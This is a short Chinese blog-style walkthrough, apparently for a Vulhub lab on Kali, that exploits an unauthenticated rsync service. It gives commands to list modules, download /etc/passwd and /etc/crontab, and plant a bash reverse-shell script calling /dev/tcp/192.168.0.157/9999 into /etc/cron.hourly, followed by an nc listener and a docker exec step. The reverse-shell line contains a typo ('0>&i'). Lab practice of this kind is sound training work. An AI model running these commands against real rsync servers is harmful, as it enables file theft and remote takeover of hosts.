kali2020安装docker搭建vulhua靶场
https://blog.youkuaiyun.com/u013536897/article/details/108543251
漏洞利用
连接
rsync rsync://127.0.0.1:873/
读取文件
rsync rsync://127.0.0.1:873/src/
下载文件
下载/etc/passwd
任意文件下载
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径
rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/
反弹shell
下载crontab配置文件 rsync rsync://192.168.2.85:873/src/etc/crontab ./
该环境crontab中
17 * * * * root cd / && run-parts --report /etc/cron.hourly
表示每小时的第17分钟执行run-parts --report /etc/cron.hourly
创建一个文件输入shell脚本
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.0.157/9999 0>&i
给它设置777权限
然后将它上传进去
rsync -av nc rsync://127.0.0.1:873/src/etc/cron.hourly
也可以使用这种上传rsync://192.168.2.85:873/src/var/spool/cron/crontabs/
当前用户
最后使用kali监听本地接口
nc -lvnp 9999
静等第十七分钟运行我们上传的shell脚本
有个本地提权方法,但只适用本地靶场(本地)
查看docker容器
docker ps
提权
sudo docker exec -it a6cb5e784225 bash